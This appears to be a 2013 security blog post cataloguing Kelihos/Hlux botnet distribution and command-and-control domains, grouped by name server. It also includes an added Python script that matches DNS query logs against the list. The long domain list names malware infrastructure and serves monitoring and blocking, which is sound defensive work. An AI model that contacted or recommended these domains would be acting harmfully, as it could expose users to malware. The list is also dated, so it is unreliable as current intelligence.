<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEObgJNszXjpCv-380w_rMDh3uA3aOSn41PodyawJPzrBowNNIbGWyL-0Ws8eHN2BtzkpvbEOPNi8D_8R4QeHbbIkXVaT1gthCYKQuym_LeDRNYTvYOspI2dNndhegXw-bzTFDkn7CCE/s1600/map2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEObgJNszXjpCv-380w_rMDh3uA3aOSn41PodyawJPzrBowNNIbGWyL-0Ws8eHN2BtzkpvbEOPNi8D_8R4QeHbbIkXVaT1gthCYKQuym_LeDRNYTvYOspI2dNndhegXw-bzTFDkn7CCE/s320/map2.PNG" width="320" /></a></div>
</td><td><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs43MciPWDCSfuH5vqCXkfIP9ZSBaPP2Nkvw1MPcwflvyPq6CriywCb4aPoJ_SuEtd3gd9Hp8e36PI553aNxBprVNsoIRI06cskMUALe3WIUJhGoVOEXAVhJNbXtWZ2iIh80mHzx-xbW0/s1600/map1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs43MciPWDCSfuH5vqCXkfIP9ZSBaPP2Nkvw1MPcwflvyPq6CriywCb4aPoJ_SuEtd3gd9Hp8e36PI553aNxBprVNsoIRI06cskMUALe3WIUJhGoVOEXAVhJNbXtWZ2iIh80mHzx-xbW0/s320/map1.PNG" width="320" /></a></div>
</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<b><br /></b>
<br />
<div style="text-align: left;">
<b><span style="color: #e69138;">Known domains associated with Kelihos/Hlux distribution and command&amp;control servers (2012 - Feb. 2013)</span></b></div>
</div>
<div style="text-align: left;">
<br /></div>
<br />
Hundreds of domains pointing to these name servers are listed below as one list, in batches. Each batch starts with a name server line (for example ns[1-6].boomsco.com), and the domains that follow it point to that name server until the next name server line. These name servers (1500+ domains in total) are associated with Redkit, Blackhole and other exploit kits, mostly delivering Kelihos/Hlux and sometimes Virut, which has been associated with this botnet as well (<a href="http://www.symantec.com/connect/fr/blogs/waledac-gets-cozy-virut">Jan. 2013 - Waledac Gets Cozy with Virut - Symantec</a>). Some domains were moved to new name servers as the old ones were suspended (for example, many domains were moved from ns[1-6].systeat.com to ns[1-6].turbusy.com).<br />
<br />
Compare it to the usage of .eu domains from last year here: <a href="http://www.abuse.ch/?p=3658">http://www.abuse.ch/?p=3658</a>.<br />
<br />
RU domains<br />
<br />
<ul>
<li>ns[1-6].boomsco.com - domains registered on 2013-01-13 << most active now</li>
<li>ns[1-6].larstor.com - domains registered on 2012-12-22 << most active now </li>
<li>ns[1-6].berchae.com (suspended) - domains registered on 2012-12-21</li>
<li>ns[1-6].zempakiv.ru - domains registered on 2012.12.07 << most active now </li>
<li>ns[1-6].newrect.com - domains registered on 2012-08-01 </li>
<li>ns[1-6].turbusy.com - domains registered on 2012-12-07 </li>
<li>ns[1-6].chokode.com (suspended) - domains registered on 2012-09-06 </li>
<li>ns[1-6].biocruc.com (suspended) - domains registered on 2012-07-15 </li>
<li>ns[1-6].systeat.com (suspended) - domains registered on 2012-07-07 </li>
<li>ns[1-6].affour.com (suspended) - domains registered on 2012-06-29</li>
<li>ns[1-6].reetsp.com (suspended) - domains registered on 2012-06-29</li>
<li>ns[1-6].oparle.com - domains registered on 2012-06-05 </li>
<li>ns[1-6].toastop.com (suspended) - domains registered on 2012-05-27</li>
<li>ns[1-6].ocorti.com (suspended) - domains registered on 2012-04-21</li>
<li>ns[1-6].esanty.com (suspended) - domains registered on 2012-04-09</li>
<li>ns[1-6].diastr.com (suspended) - domains registered on 2012-04-09</li>
<li>ns[1-6].snapoli.com (suspended) - domains registered on 2012-04-02</li>
<li>ns[1-6].maguiso.com (suspended) - domains registered on 2012-03-05</li>
<li>ns[1-6].swartra.com - domains registered on 2011-10-12</li>
</ul>
EU domains<br />
<ul>
<li>ns[1-6].frostli.com (suspended) - domains registered on 2012-04-21</li>
<li>ns[1-6].pizzebu.com (suspended) - domains registered on 2012-01-13</li>
</ul>
IN domains<br />
<ul>
<li>ns[1-6].firstara.com - domains registered on 2012-03-08</li>
</ul>
CE.MS domains (used before 2012)<br />
<ul>
<li>ns[1-6].roblect.com - domains registered on 2011-12-01</li>
<li>ns[1-6].galloma.com - domains registered on 2011-10-31</li>
</ul>
<b><span style="color: #e69138;">Domain list</span></b><br />
All known domains, sorted by name server and age (newest on top; the name server registration dates are listed above). If you see any machine connecting to any of these domains, it is likely infected. There are some duplicates in the list, as the same domain could move from one name server to another.<br />
<br />
Download:<br />
<a href="http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt">http://files.deependresearch.org/logs/activeNS-kelihos-feb2013.txt</a> - txt file with 430+ domains using the currently active name servers, for active defense:<br />
boomsco.com<br />
larstor.com<br />
zempakiv.ru<br />
newrect.com<br />
turbusy.com<br />
<br />
<a href="http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt">http://files.deependresearch.org/logs/all-known-domains-kelihos-2012-2013.txt</a> - txt file with all 1550+ Kelihos domains known to us, including suspended and sinkholed ones (2011-2013), sorted by age (newest first), for DNS monitoring and research.<br />
<br />
There are 1550+ unique domains.<br />
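To use the list below for DNS monitoring, its batch format has to be parsed: a name server line (ns[1-6].boomsco.com, ns2.oilined.com, ...) opens a batch, and every domain after it belongs to that name server until the next such line. The following is an added example, not code from the original post or from the linked text files: it builds a domain-to-name-server map from a short constructed excerpt of the list (the duplicate abofaxtu.ru under both ns2.oilined.com and ns[1-6].newrect.com is taken from the list itself), then matches BIND-style query log lines, also constructed for the example, against it, including queries for subdomains of a listed domain.

```python
"""Match DNS query logs against the Kelihos domain list.

Added example (not from the original post). Because the same domain can
appear under more than one name server (domains were moved when a name
server was suspended), each domain maps to a set of name servers.
"""
import re
from collections import defaultdict

# A batch header: ns2.oilined.com or ns[1-6].boomsco.com style lines.
NS_LINE = re.compile(r"^ns(?:\d|\[\d-\d\])\.[a-z0-9-]+\.[a-z]+$")

# BIND query log line: "client 10.0.0.5#51234: query: wowrizep.ru IN A + (10.0.0.1)"
BIND_QUERY = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def parse_batches(text: str):
    """Return {domain: {nameserver, ...}} from the batch-formatted list."""
    mapping = defaultdict(set)
    current = None
    for line in text.splitlines():
        line = line.strip().lower()
        if not line:
            continue
        if NS_LINE.match(line):
            current = line  # new batch: following domains point here
            continue
        if current is None:
            raise ValueError(f"domain {line!r} appears before any name server line")
        mapping[line].add(current)
    return dict(mapping)


def candidates(qname: str):
    """Yield the queried name and each parent: a.b.c.ru -> a.b.c.ru, b.c.ru, c.ru."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])


def scan_dns_log(log_lines, mapping):
    """Return (client_ip, queried_name, matched_domain, nameservers) for each hit.

    A query for a subdomain of a listed domain is a hit on the listed domain,
    so the client is caught even if the bot resolves a host under it.
    """
    hits = []
    for line in log_lines:
        m = BIND_QUERY.search(line)
        if not m:
            continue
        for cand in candidates(m["qname"]):
            if cand in mapping:
                hits.append((m["ip"], m["qname"].rstrip("."), cand, sorted(mapping[cand])))
                break
    return hits


# Constructed excerpt in the exact format of the list below; the real file
# (1550+ domains) is linked above.
LIST_EXCERPT = """\
ns[1-6].boomsco.com
aggeymin.ru
amxylkap.ru

ns[1-6].larstor.com
akpuxqaz.ru
wowrizep.ru

ns2.oilined.com
abofaxtu.ru

ns[1-6].newrect.com
avenqyz.ru
abofaxtu.ru
"""

# Constructed query log lines: one clean lookup, one subdomain of a listed
# domain and one domain that sits under two name servers.
SAMPLE_LOG = [
    "08-Feb-2013 10:02:11.123 client 10.0.0.5#51234: query: wowrizep.ru IN A + (10.0.0.1)",
    "08-Feb-2013 10:02:12.004 client 10.0.0.5#51235: query: www.example.com IN A + (10.0.0.1)",
    "08-Feb-2013 10:02:13.870 client 10.0.0.9#40021: query: mail.akpuxqaz.ru IN MX + (10.0.0.1)",
    "08-Feb-2013 10:02:14.201 client 10.0.0.9#40022: query: abofaxtu.ru IN A + (10.0.0.1)",
]

if __name__ == "__main__":
    table = parse_batches(LIST_EXCERPT)
    for ip, qname, matched, servers in scan_dns_log(SAMPLE_LOG, table):
        print(f"{ip} asked for {qname}: listed as {matched} under {', '.join(servers)}")
```

Feed it the downloaded text files instead of LIST_EXCERPT to get the full map; the name server set on each hit tells you which batch (and therefore which registration wave) the domain belongs to, which is useful when deciding whether a sinkholed or suspended batch still needs a block.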
<div style="border: 8px double rgb(78, 150, 139); height: 280px; overflow: scroll; width: 500px;">
ns[1-6].boomsco.com<br />
aggeymin.ru<br />
amxylkap.ru<br />
aqqajofi.ru<br />
asyknika.ru<br />
bojsedyt.ru<br />
cevlyxaq.ru<br />
copapjid.ru<br />
cujemjev.ru<br />
dikojnah.ru<br />
dobikuwe.ru<br />
dubfoluc.ru<br />
dyrzaqfu.ru<br />
dyxketam.ru<br />
egygumlo.ru<br />
fachejyp.ru<br />
favickov.ru<br />
fycedqek.ru<br />
fytfotlo.ru<br />
giffunri.ru<br />
gishabet.ru<br />
guqyvzap.ru<br />
gybebeho.ru<br />
gyvolnac.ru<br />
icepijog.ru<br />
iszivkyc.ru<br />
jiyknuqi.ru<br />
linyaqor.ru<br />
lisybsij.ru<br />
lyfqekow.ru<br />
nebgisyk.ru<br />
ojvectyk.ru<br />
olsicwiq.ru<br />
owideker.ru<br />
pahfyhfi.ru<br />
papcybop.ru<br />
pecunvom.ru<br />
pegarpem.ru<br />
pipuwbap.ru<br />
pusycqyz.ru<br />
qatuhnaf.ru<br />
qiqwoxki.ru<br />
qysmahku.ru<br />
rulwusyc.ru<br />
sedfibyr.ru<br />
solhusny.ru<br />
sudiydyx.ru<br />
syrjikhe.ru<br />
tegeqfux.ru<br />
tepmahiq.ru<br />
tijenric.ru<br />
todqenym.ru<br />
tubtihiv.ru<br />
uvvycceh.ru<br />
vacrajak.ru<br />
viackipa.ru<br />
vubupbeb.ru<br />
vybakcov.ru<br />
vyfnozed.ru<br />
vygwomak.ru<br />
wevwubhy.ru<br />
woldanov.ru<br />
xifaknow.ru<br />
xitydjeg.ru<br />
xizzawvu.ru<br />
xyjiekfe.ru<br />
yjaqexha.ru<br />
ykmeffyw.ru<br />
ylgoaxle.ru<br />
yvxaghod.ru<br />
zakiixwe.ru<br />
zehyqjol.ru<br />
zyfwomep.ru<br />
zyqutfeb.ru<br />
zyrapfev.ru<br />
<br />
<br />
ns[1-6].larstor.com<br />
acdastas.ru<br />
afdotrin.ru<br />
akmaxook.ru<br />
akpuxqaz.ru<br />
anhofciv.ru<br />
apnifosa.ru<br />
awetefid.ru<br />
batycfac.ru<br />
bowbiluk.ru<br />
bugfivin.ru<br />
cagremub.ru<br />
cimhuspi.ru<br />
didcufun.ru<br />
diqnawug.ru<br />
diteqciq.ru<br />
dofihhog.ru<br />
dokelzel.ru<br />
dufyhive.ru<br />
ecrihgep.ru<br />
ejzazsax.ru<br />
ektizzab.ru<br />
eldacbet.ru<br />
epejanhi.ru<br />
ewenhugi.ru<br />
fedvojvy.ru<br />
fetolbus.ru<br />
gehxehib.ru<br />
goktypxi.ru<br />
guphumsa.ru<br />
hulirkox.ru<br />
ixehmona.ru<br />
jasfagal.ru<br />
jiwviqpa.ru<br />
jizevcyr.ru<br />
jizugqux.ru<br />
joljihuk.ru<br />
jonkisig.ru<br />
junedles.ru<br />
kevzimom.ru<br />
kicsodho.ru<br />
laqursoh.ru<br />
lejbomor.ru<br />
lilkepiv.ru<br />
liwuwquh.ru<br />
lofibvar.ru<br />
lymurufa.ru<br />
merwiqca.ru<br />
nopepkaq.ru<br />
nosgazim.ru<br />
nozwyhvi.ru<br />
nylzudwo.ru<br />
ocbiccan.ru<br />
odmurwal.ru<br />
ophirjih.ru<br />
otfasdac.ru<br />
pikkokih.ru<br />
pinvahub.ru<br />
pofhufso.ru<br />
pomywwaq.ru<br />
pypwalve.ru<br />
qyxoxuzo.ru<br />
rabpabyr.ru<br />
racapsyq.ru<br />
raguhloc.ru<br />
rujascur.ru<br />
soduvnec.ru<br />
sumjecyg.ru<br />
tuguijab.ru<br />
tyjkexax.ru<br />
ugnyspyr.ru<br />
uhpygxav.ru<br />
uqoquchy.ru<br />
vibewpav.ru<br />
vopiifdu.ru<br />
vortatar.ru<br />
vyzyxqyg.ru<br />
wowrizep.ru<br />
wufjajcy.ru<br />
xivobwyb.ru<br />
yficebnu.ru<br />
ynpucwif.ru<br />
ypvudhek.ru<br />
zazzeqan.ru<br />
zedwyzuc.ru<br />
zegkyfga.ru<br />
zunvexuq.ru<br />
<br />
ns2.oilined.com<br />
abofaxtu.ru<br />
afxeftof.ru<br />
ajgijuap.ru<br />
atkoskih.ru<br />
atxembef.ru<br />
avmakpyt.ru<br />
axcakqif.ru<br />
azvaebyn.ru<br />
bakuzbuq.ru<br />
bangurec.ru<br />
behbusqu.ru<br />
cesivpil.ru<br />
citpoloj.ru<br />
cucaklif.ru<br />
cundimam.ru<br />
dohjapju.ru<br />
enhawcus.ru<br />
etujaqhe.ru<br />
faplejir.ru<br />
fawsilom.ru<br />
fidqyzar.ru<br />
fiwbyjhu.ru<br />
focpidas.ru<br />
fyzsicat.ru<br />
gijcodox.ru<br />
girwysca.ru<br />
gywquroz.ru<br />
hevlehaw.ru<br />
hezyddij.ru<br />
hikutcur.ru<br />
ibjiocuw.ru<br />
ihdidcyd.ru<br />
ikbyznod.ru<br />
irtoexki.ru<br />
isbegisy.ru<br />
iwhuwugy.ru<br />
iwnemfam.ru<br />
ixfocgaf.ru<br />
jilvoqsi.ru<br />
jiragsug.ru<br />
jureetse.ru<br />
juuqbuah.ru<br />
kixqusos.ru<br />
kugfulyw.ru<br />
lafdamow.ru<br />
lecjefys.ru<br />
linsubby.ru<br />
liwmiccu.ru<br />
mywbywur.ru<br />
narzoquc.ru<br />
norfikuf.ru<br />
nowqubxi.ru<br />
nudsawyj.ru<br />
nuzejviz.ru<br />
nypmivhy.ru<br />
nyzvelew.ru<br />
ogedlayc.ru<br />
oqivynle.ru<br />
owtaprel.ru<br />
pegkowoz.ru<br />
powosjec.ru<br />
qamelzyc.ru<br />
qufexkig.ru<br />
qyqkedpy.ru<br />
qysriloh.ru<br />
rehvuwib.ru<br />
rosacomi.ru<br />
ryqpynar.ru<br />
secegbiw.ru<br />
sepsiqbo.ru<br />
sybqipfe.ru<br />
syxozwag.ru<br />
taosiram.ru<br />
tiglatep.ru<br />
toszegky.ru<br />
towmidar.ru<br />
tozlisdi.ru<br />
tunzovnu.ru<br />
tyryfpix.ru<br />
ucxegxox.ru<br />
urvohnux.ru<br />
vagavheh.ru<br />
vehyfgor.ru<br />
wascadux.ru<br />
waxpehby.ru<br />
worgukiw.ru<br />
xoztyhto.ru<br />
ydfivmim.ru<br />
yjjipdyl.ru<br />
yksigxes.ru<br />
ykyczeis.ru<br />
zempakiv.ru<br />
zifrazah.ru<br />
zitifhuz.ru<br />
zurgovod.ru<br />
zuzikkeg.ru<br />
<br />
ns[1-6].newrect.com<br />
avenqyz.ru<br />
axbuzyg.ru<br />
azkenyb.ru<br />
azkygaj.ru<br />
baefrih.ru<br />
bicjeko.ru<br />
buhfyta.ru<br />
bumwiyc.ru<br />
bypimih.ru<br />
byxkauv.ru<br />
ceguheq.ru<br />
copyseq.ru<br />
deqbyyq.ru<br />
ebtanij.ru<br />
ekabdyz.ru<br />
ekafken.ru<br />
emjokar.ru<br />
epsaboq.ru<br />
eqtiwuf.ru<br />
evleseh.ru<br />
evutdoz.ru<br />
ewtaniq.ru<br />
focegob.ru<br />
folkaax.ru<br />
fubojla.ru<br />
fuvijsa.ru<br />
fynydre.ru<br />
fyvavcu.ru<br />
goxizap.ru<br />
harwauz.ru<br />
haxuryg.ru<br />
himytyp.ru<br />
hucimaf.ru<br />
huwxiyl.ru<br />
iloblod.ru<br />
ilulxak.ru<br />
innefwo.ru<br />
irroxux.ru<br />
jakybus.ru<br />
jerjigo.ru<br />
jifecad.ru<br />
jokbuoj.ru<br />
jyluxel.ru<br />
kidazpa.ru<br />
kovawap.ru<br />
kykufep.ru<br />
latokoz.ru<br />
lirowyg.ru<br />
lofbiwa.ru<br />
lohucif.ru<br />
lujmyvo.ru<br />
majiqec.ru<br />
mochusi.ru<br />
neiscig.ru<br />
nixuxor.ru<br />
nodyfux.ru<br />
nonogci.ru<br />
nycaqsy.ru<br />
nyygtic.ru<br />
obymhij.ru<br />
odgazoz.ru<br />
ogazbyj.ru<br />
ogpexol.ru<br />
ohdujne.ru<br />
ollobun.ru<br />
onixdud.ru<br />
orxykud.ru<br />
otrasan.ru<br />
owpejip.ru<br />
pyjivga.ru<br />
qadazor.ru<br />
qadyqow.ru<br />
qaokdyj.ru<br />
qaromyz.ru<br />
qewkima.ru<br />
qovizki.ru<br />
rijygur.ru<br />
rovikvy.ru<br />
ruqyxed.ru<br />
ryygwoh.ru<br />
sejyfat.ru<br />
semgijo.ru<br />
tenuluc.ru<br />
tivizty.ru<br />
towilax.ru<br />
tuqjyze.ru<br />
ugcyneg.ru<br />
unwylhi.ru<br />
unxajen.ru<br />
urekkyf.ru<br />
uvehpan.ru<br />
vaqnula.ru<br />
vepyhga.ru<br />
viqsieb.ru<br />
voqukyh.ru<br />
wekveom.ru<br />
wenybwu.ru<br />
weozgyv.ru<br />
wokseja.ru<br />
wufkedy.ru<br />
wumyhma.ru<br />
wylyhan.ru<br />
xeatsif.ru<br />
xiguzow.ru<br />
xowkocy.ru<br />
xurywdo.ru<br />
xyqysaf.ru<br />
ydhomum.ru<br />
ydywzik.ru<br />
zegykso.ru<br />
zofabby.ru<br />
zuattiw.ru<br />
zyglooj.ru<br />
zytidel.ru<br />
abofaxtu.ru<br />
afxeftof.ru<br />
ahtiagge.ru<br />
ajgijuap.ru<br />
atkoskih.ru<br />
atxembef.ru<br />
avmakpyt.ru<br />
axcakqif.ru<br />
azvaebyn.ru<br />
bakuzbuq.ru<br />
bangurec.ru<br />
behbusqu.ru<br />
cesivpil.ru<br />
citpoloj.ru<br />
cucaklif.ru<br />
cundimam.ru<br />
dohjapju.ru<br />
enhawcus.ru<br />
etujaqhe.ru<br />
faplejir.ru<br />
fawsilom.ru<br />
fidqyzar.ru<br />
fiwbyjhu.ru<br />
focpidas.ru<br />
fyzsicat.ru<br />
gasosvaz.ru<br />
gegwikaf.ru<br />
gijcodox.ru<br />
girwysca.ru<br />
gywquroz.ru<br />
hevlehaw.ru<br />
hezyddij.ru<br />
hikutcur.ru<br />
ibjiocuw.ru<br />
ihdidcyd.ru<br />
ikbyznod.ru<br />
irtoexki.ru<br />
isbegisy.ru<br />
iwhuwugy.ru<br />
iwnemfam.ru<br />
ixfocgaf.ru<br />
jilvoqsi.ru<br />
jiragsug.ru<br />
jureetse.ru<br />
juuqbuah.ru<br />
kixqusos.ru<br />
kugfulyw.ru<br />
lafdamow.ru<br />
lecjefys.ru<br />
linsubby.ru<br />
liwmiccu.ru<br />
mywbywur.ru<br />
narzoquc.ru<br />
norfikuf.ru<br />
nowqubxi.ru<br />
nudsawyj.ru<br />
nuzejviz.ru<br />
nypmivhy.ru<br />
nyzvelew.ru<br />
ogedlayc.ru<br />
oqivynle.ru<br />
owtaprel.ru<br />
pegkowoz.ru<br />
powosjec.ru<br />
qamelzyc.ru<br />
qufexkig.ru<br />
qyqkedpy.ru<br />
qysriloh.ru<br />
rehvuwib.ru<br />
rosacomi.ru<br />
ryqpynar.ru<br />
secegbiw.ru<br />
sepsiqbo.ru<br />
sybqipfe.ru<br />
syxozwag.ru<br />
taosiram.ru<br />
tiglatep.ru<br />
toszegky.ru<br />
towmidar.ru<br />
tozlisdi.ru<br />
tunzovnu.ru<br />
tyryfpix.ru<br />
ucxegxox.ru<br />
urvohnux.ru<br />
vagavheh.ru<br />
vehyfgor.ru<br />
voxyqjyc.ru<br />
wascadux.ru<br />
waxpehby.ru<br />
worgukiw.ru<br />
xoztyhto.ru<br />
ydfivmim.ru<br />
yjjipdyl.ru<br />
yksigxes.ru<br />
ykyczeis.ru<br />
zifrazah.ru<br />
zitifhuz.ru<br />
zurgovod.ru<br />
zuzikkeg.ru<br />
<br />
<br />
ns[1-6].turbusy.com<br />
aletazgi.ru<br />
aqzepylu.ru<br />
batpicur.ru<br />
byjlegta.ru<br />
cybbijyl.ru<br />
cylqiduh.ru<br />
deafesqy.ru<br />
egsuista.ru<br />
facujfet.ru<br />
fevnotow.ru<br />
fidedhah.ru<br />
gamselni.ru<br />
gegzyvet.ru<br />
gywilhof.ru<br />
hahsekju.ru<br />
heztymut.ru<br />
huquqxov.ru<br />
ivkikcop.ru<br />
jamwazer.ru<br />
judxagaf.ru<br />
jymeegom.ru<br />
leqgugom.ru<br />
lupylzum.ru<br />
mosjinme.ru<br />
neluzjiv.ru<br />
niliqrix.ru<br />
nobzekyx.ru<br />
ocgaextu.ru<br />
ojpaxlam.ru<br />
oqlapjim.ru<br />
otxolpow.ru<br />
pegyrgun.ru<br />
pevhyvys.ru<br />
pogwytfy.ru<br />
pynxomoj.ru<br />
qutgagnu.ru<br />
ruxymqic.ru<br />
sesuhror.ru<br />
sittanyg.ru<br />
sivzoror.ru<br />
siwebheb.ru<br />
tahfifak.ru<br />
tecviqir.ru<br />
tiwciwux.ru<br />
udemirus.ru<br />
ugsovraw.ru<br />
uwfekfyj.ru<br />
votqygiq.ru<br />
wetifjam.ru<br />
wibveces.ru<br />
wofgyqyv.ru<br />
xeznosfu.ru<br />
xifdupyc.ru<br />
xikmonej.ru<br />
xylyvkan.ru<br />
ycjukgup.ru<br />
ynjaprur.ru<br />
ystinqoc.ru<br />
zuqijcel.ru<br />
<br />
<br />
ns[1-6].chokode.com<br />
aldiplil.ru<br />
apzafqyj.ru<br />
arhutsyb.ru<br />
bawodnes.ru<br />
bepmetic.ru<br />
biskehud.ru<br />
bovtesma.ru<br />
budymnyn.ru<br />
bykicnof.ru<br />
bymritun.ru<br />
cavterjy.ru<br />
cemyyzwe.ru<br />
cihdiryh.ru<br />
cilcenok.ru<br />
ciriljug.ru<br />
colzoqko.ru<br />
copybvow.ru<br />
cuchuqis.ru<br />
cyldoqic.ru<br />
cyxgekle.ru<br />
datsonyl.ru<br />
dawkavka.ru<br />
dibpohog.ru<br />
diumjacu.ru<br />
dotbikeg.ru<br />
ekmydpap.ru<br />
espisceq.ru<br />
etpazxej.ru<br />
exdeflyl.ru<br />
faddixdy.ru<br />
fenqykqy.ru<br />
fettucod.ru<br />
feztaxov.ru<br />
fivfyjmy.ru<br />
gezahcyg.ru<br />
giqudfip.ru<br />
gozzujuc.ru<br />
gyhimkyv.ru<br />
gyzigcyd.ru<br />
hahbikri.ru<br />
hedeqcec.ru<br />
himxyjaj.ru<br />
hoqoxnof.ru<br />
ibpintor.ru<br />
idxoceac.ru<br />
ilsyzfiq.ru<br />
imvypvyz.ru<br />
inboimdi.ru<br />
iwnulvak.ru<br />
jaqvicmy.ru<br />
jozaqpol.ru<br />
karzomug.ru<br />
keturduq.ru<br />
kuedzioc.ru<br />
kumalzoh.ru<br />
kutuqwyc.ru<br />
laqypxez.ru<br />
lavydfen.ru<br />
luhhinwa.ru<br />
maduvhap.ru<br />
mefizner.ru<br />
meglexis.ru<br />
modofpaw.ru<br />
mushycle.ru<br />
mywyflaq.ru<br />
myzyswot.ru<br />
nihagmyv.ru<br />
nihfedki.ru<br />
nivcegik.ru<br />
nobunzal.ru<br />
nogdupty.ru<br />
nohdekyk.ru<br />
nudysmih.ru<br />
nujqamdi.ru<br />
obpippih.ru<br />
odolnaer.ru<br />
olwagmuf.ru<br />
ompassik.ru<br />
oqcilvis.ru<br />
oxbogzus.ru<br />
ozpyrgax.ru<br />
peftuqij.ru<br />
peletbog.ru<br />
pijilvad.ru<br />
pohzebib.ru<br />
puvlyjap.ru<br />
pyvizgaf.ru<br />
qaqipwel.ru<br />
qesaqead.ru<br />
qetivqep.ru<br />
qosxatys.ru<br />
quisoqug.ru<br />
quqkajiv.ru<br />
qytzysyd.ru<br />
rapefzab.ru<br />
rocxokex.ru<br />
romazlon.ru<br />
rufmazru.ru<br />
rydmuqho.ru<br />
samuzryv.ru<br />
sawvuctu.ru<br />
seslopyn.ru<br />
suhaqtak.ru<br />
sumsonwy.ru<br />
syjinram.ru<br />
sytpigyq.ru<br />
tamyhqok.ru<br />
tesoeqwu.ru<br />
tezujrad.ru<br />
tymurlud.ru<br />
ucajbiud.ru<br />
uhjuftah.ru<br />
uhpadcor.ru<br />
upjyjqux.ru<br />
uqboluqy.ru<br />
uqnymtyq.ru<br />
uxtadson.ru<br />
uxtiwtis.ru<br />
vakcudaq.ru<br />
vargigsi.ru<br />
varobgag.ru<br />
vaxalbax.ru<br />
vecvycte.ru<br />
vedriwmi.ru<br />
vesnobuz.ru<br />
vibawtan.ru<br />
vizxaxel.ru<br />
vomzemyq.ru<br />
vuzjoswy.ru<br />
wazidzaf.ru<br />
wexhunpu.ru<br />
wiqenmoj.ru<br />
wixelnab.ru<br />
wobapbyg.ru<br />
wupromxu.ru<br />
wydybpuv.ru<br />
xemtyroz.ru<br />
ximxupih.ru<br />
xiqpexsy.ru<br />
xityxgem.ru<br />
xudyhbes.ru<br />
xycsapef.ru<br />
ydruofik.ru<br />
ykpaoxyp.ru<br />
yphiquof.ru<br />
yscaduif.ru<br />
ytnainqy.ru<br />
yvmygdus.ru<br />
yzhepqyz.ru<br />
zacakpym.ru<br />
zaguqcux.ru<br />
zamponyt.ru<br />
zehredic.ru<br />
zincikur.ru<br />
zocdisge.ru<br />
zogjolga.ru<br />
zubbivpo.ru<br />
zudxohok.ru<br />
zywjixuw.ru<br />
abaxhad.ru<br />
adnedat.ru<br />
adtesok.ru<br />
asmukuf.ru<br />
awewsip.ru<br />
bipulte.ru<br />
biwuvba.ru<br />
bopwyeb.ru<br />
bowbaiv.ru<br />
byvbymy.ru<br />
caqxaro.ru<br />
citsibe.ru<br />
dalwoza.ru<br />
darabub.ru<br />
dinymak.ru<br />
doxilik.ru<br />
egnisje.ru<br />
estesgo.ru<br />
evdyvaz.ru<br />
fetucxo.ru<br />
fixavpu.ru<br />
gazuzoz.ru<br />
gedopan.ru<br />
gubahvi.ru<br />
haponeg.ru<br />
hedybih.ru<br />
hitakat.ru<br />
ihmytog.ru<br />
ikevzaq.ru<br />
imgohut.ru<br />
ipdehas.ru<br />
irhegre.ru<br />
ivnuvuk.ru<br />
iwvahin.ru<br />
izxirfy.ru<br />
jaibzup.ru<br />
jedytlu.ru<br />
jodkymy.ru<br />
jokenqi.ru<br />
jykyvca.ru<br />
jytorqu.ru<br />
kejejib.ru<br />
kycufvy.ru<br />
lopoqyv.ru<br />
luditla.ru<br />
mabuhos.ru<br />
muhipew.ru<br />
muwosiv.ru<br />
nybzywy.ru<br />
oqjogxi.ru<br />
osmuryf.ru<br />
otpipug.ru<br />
pagubev.ru<br />
pawahav.ru<br />
pyykxug.ru<br />
qiquzcy.ru<br />
quohdit.ru<br />
rekvyfo.ru<br />
rifirac.ru<br />
risytfa.ru<br />
ritrios.ru<br />
rujfeag.ru<br />
rybuhoq.ru<br />
rykafeh.ru<br />
saxyjuw.ru<br />
sihemuj.ru<br />
sohaxim.ru<br />
soqvaqo.ru<br />
sutimjy.ru<br />
taixcih.ru<br />
tikoqox.ru<br />
tozfyma.ru<br />
turiwil.ru<br />
ucelgos.ru<br />
udxowub.ru<br />
udzycaf.ru<br />
uggifym.ru<br />
uhduxic.ru<br />
uhzubvo.ru<br />
umpefan.ru<br />
uqlahaf.ru<br />
uxfokur.ru<br />
uxosgik.ru<br />
veuwhyz.ru<br />
vunjuet.ru<br />
vuohsub.ru<br />
wefecfo.ru<br />
wyjenqo.ru<br />
xenacoz.ru<br />
xofsimi.ru<br />
xogitaj.ru<br />
xomoqol.ru<br />
ybsahov.ru<br />
ydabxag.ru<br />
ykocnar.ru<br />
ynkicyr.ru<br />
yxyqwiz.ru<br />
yzsabuq.ru<br />
zidamuk.ru<br />
zylhomu.ru<br />
<br />
<br />
ns[1-6].biocruc.com<br />
abaxhad.ru<br />
adnedat.ru<br />
adtesok.ru<br />
asmukuf.ru<br />
awewsip.ru<br />
bipulte.ru<br />
biwuvba.ru<br />
bopwyeb.ru<br />
bowbaiv.ru<br />
byvbymy.ru<br />
caqxaro.ru<br />
citsibe.ru<br />
dalwoza.ru<br />
darabub.ru<br />
dinymak.ru<br />
doxilik.ru<br />
egnisje.ru<br />
estesgo.ru<br />
evdyvaz.ru<br />
fetucxo.ru<br />
fixavpu.ru<br />
gazuzoz.ru<br />
gedopan.ru<br />
gubahvi.ru<br />
haponeg.ru<br />
hedybih.ru<br />
hitakat.ru<br />
ihmytog.ru<br />
ikevzaq.ru<br />
imgohut.ru<br />
ipdehas.ru<br />
irhegre.ru<br />
ivnuvuk.ru<br />
iwvahin.ru<br />
izxirfy.ru<br />
jaibzup.ru<br />
jedytlu.ru<br />
jodkymy.ru<br />
jokenqi.ru<br />
jykyvca.ru<br />
jytorqu.ru<br />
kejejib.ru<br />
kycufvy.ru<br />
lopoqyv.ru<br />
luditla.ru<br />
mabuhos.ru<br />
muhipew.ru<br />
muwosiv.ru<br />
nybzywy.ru<br />
oqjogxi.ru<br />
osmuryf.ru<br />
otpipug.ru<br />
pagubev.ru<br />
pawahav.ru<br />
pyykxug.ru<br />
qiquzcy.ru<br />
